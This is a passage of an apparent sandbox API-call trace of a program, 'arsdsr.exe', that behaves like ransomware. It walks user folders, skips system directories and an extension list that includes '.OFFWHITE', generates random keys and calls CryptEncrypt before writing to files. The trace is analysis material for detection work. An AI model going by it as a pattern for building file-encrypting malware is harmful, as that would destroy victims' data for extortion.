(lpString1="..", lpString2=".") returned 1 [0135.933] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.933] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0135.933] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0135.933] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0135.933] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0135.933] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0135.933] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0135.933] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0135.933] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0135.934] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0135.934] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0135.934] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0135.934] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0135.934] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\" [0135.934] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" [0135.934] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.934] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.934] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0135.934] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0135.934] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0135.934] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0135.934] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0135.934] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0135.934] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0135.934] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0135.934] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0135.934] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0135.934] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Searches", cAlternateFileName="")) returned 1 [0135.934] lstrcmpiW (lpString1="Searches", lpString2=".") returned 1 [0135.934] lstrcmpiW (lpString1="Searches", lpString2="..") returned 1 [0135.934] lstrcmpiW (lpString1="Searches", lpString2="...") returned 1 [0135.935] lstrcmpiW (lpString1="Searches", lpString2="windows") returned -1 [0135.935] lstrcmpiW (lpString1="Searches", lpString2="$recycle.bin") returned 1 [0135.935] lstrcmpiW (lpString1="Searches", lpString2="rsa") returned 1 [0135.935] lstrcmpiW (lpString1="Searches", lpString2="ntuser.dat") returned 1 [0135.935] lstrcmpiW (lpString1="Searches", lpString2="programdata") returned 1 [0135.935] lstrcmpiW (lpString1="Searches", lpString2="appdata") returned 1 [0135.935] lstrcmpiW (lpString1="Searches", lpString2="program files") returned 1 [0135.935] lstrcmpiW (lpString1="Searches", lpString2="program files (x86)") returned 1 [0135.935] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.935] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Searches" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0135.935] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0135.935] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0135.935] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*" [0135.935] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName=".", cAlternateFileName="")) returned 0x544610 [0135.937] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.937] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="..", cAlternateFileName="")) returned 1 [0135.937] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.937] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.937] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0135.937] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0135.937] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0135.937] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0135.937] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0135.937] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0135.937] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0135.937] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0135.938] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0135.938] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0135.938] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0135.938] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0135.938] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0135.938] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" [0135.938] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.938] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.938] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0135.938] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0135.938] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0135.938] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0135.938] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0135.938] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0135.938] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0135.938] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0135.938] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0135.938] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0135.938] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0135.938] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="...") returned 1 [0135.938] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="windows") returned -1 [0135.938] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="$recycle.bin") returned 1 [0135.938] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="rsa") returned -1 [0135.938] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat") returned -1 [0135.938] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="programdata") returned -1 [0135.939] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="appdata") returned 1 [0135.939] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="program files") returned -1 [0135.939] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="program files (x86)") returned -1 [0135.939] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0135.939] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Everywhere.search-ms" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" [0135.939] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.939] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.939] PathFindExtensionW (pszPath="Everywhere.search-ms") returned=".search-ms" [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".exe") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".log") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".cab") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".cmd") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".com") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".cpl") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".ini") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".dll") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".url") returned -1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".ttf") returned -1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".mp3") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".pif") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".mp4") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".OFFWHITE") returned 1 [0135.939] lstrcmpiW (lpString1=".search-ms", lpString2=".msi") returned 1 [0135.939] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.939] GetProcessHeap () returned 0x500000 [0135.939] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521fc0 [0135.940] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.940] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=-4251589180) returned 0 [0135.941] GetProcessHeap () returned 0x500000 [0135.941] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.941] GetProcessHeap () returned 0x500000 [0135.941] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.941] GetProcessHeap () returned 0x500000 [0135.941] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.941] GetProcessHeap () returned 0x500000 [0135.941] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.941] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.941] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.941] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.941] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.941] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.941] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.941] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.941] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.941] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.941] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.942] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.942] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.942] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295e5c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0135.942] SetLastError (dwErrCode=0x0) [0135.942] WriteFile (in: hFile=0xffffffff, lpBuffer=0x524d00, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0) returned 0 [0135.942] GetLastError () returned 0x6 [0135.942] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2=".") returned 1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="..") returned 1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="...") returned 1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="windows") returned -1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="$recycle.bin") returned 1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="rsa") returned -1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="ntuser.dat") returned -1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="programdata") returned -1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="appdata") returned 1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="program files") returned -1 [0135.942] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="program files (x86)") returned -1 [0135.943] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\" [0135.943] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\", lpString2="Indexed Locations.search-ms" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" [0135.943] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.943] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.943] PathFindExtensionW (pszPath="Indexed Locations.search-ms") returned=".search-ms" [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".exe") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".log") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".cab") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".cmd") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".com") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".cpl") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".ini") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".dll") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".url") returned -1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".ttf") returned -1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".mp3") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".pif") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".mp4") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".OFFWHITE") returned 1 [0135.943] lstrcmpiW (lpString1=".search-ms", lpString2=".msi") returned 1 [0135.943] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.943] GetProcessHeap () returned 0x500000 [0135.943] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x521fd0 [0135.943] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0135.944] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=-4251589180) returned 0 [0135.944] GetProcessHeap () returned 0x500000 [0135.944] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531500 [0135.944] GetProcessHeap () returned 0x500000 [0135.944] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x531518 [0135.944] GetProcessHeap () returned 0x500000 [0135.944] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524f10 [0135.944] GetProcessHeap () returned 0x500000 [0135.944] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x525018 [0135.944] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.944] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.944] SystemFunction036 (in: RandomBuffer=0x531500, RandomBufferLength=0x10 | out: RandomBuffer=0x531500) returned 1 [0135.944] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.944] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.944] SystemFunction036 (in: RandomBuffer=0x531518, RandomBufferLength=0x10 | out: RandomBuffer=0x531518) returned 1 [0135.944] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.944] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.944] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524f10*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x524f10*, pdwDataLen=0x295e310*=0x100) returned 1 [0135.945] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.945] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.945] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x525018*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x525018*, pdwDataLen=0x295e30c*=0x100) returned 1 [0135.945] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295e5c4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0135.945] SetLastError (dwErrCode=0x0) [0135.945] WriteFile (in: hFile=0xffffffff, lpBuffer=0x524f10, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0) returned 0 [0135.945] GetLastError () returned 0x6 [0135.945] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xb05818e0, dwReserved1=0x8909b951, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0135.945] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0135.946] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0135.946] lstrcmpiW (lpString1="SendTo", lpString2=".") returned 1 [0135.946] lstrcmpiW (lpString1="SendTo", lpString2="..") returned 1 [0135.946] lstrcmpiW (lpString1="SendTo", lpString2="...") returned 1 [0135.946] lstrcmpiW (lpString1="SendTo", lpString2="windows") returned -1 [0135.947] lstrcmpiW (lpString1="SendTo", lpString2="$recycle.bin") returned 1 [0135.947] lstrcmpiW (lpString1="SendTo", lpString2="rsa") returned 1 [0135.947] lstrcmpiW (lpString1="SendTo", lpString2="ntuser.dat") returned 1 [0135.947] lstrcmpiW (lpString1="SendTo", lpString2="programdata") returned 1 [0135.947] lstrcmpiW (lpString1="SendTo", lpString2="appdata") returned 1 [0135.947] lstrcmpiW (lpString1="SendTo", lpString2="program files") returned 1 [0135.947] lstrcmpiW (lpString1="SendTo", lpString2="program files (x86)") returned 1 [0135.947] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0135.947] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="SendTo" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo" [0135.947] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" [0135.947] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\" [0135.947] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*" [0135.947] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 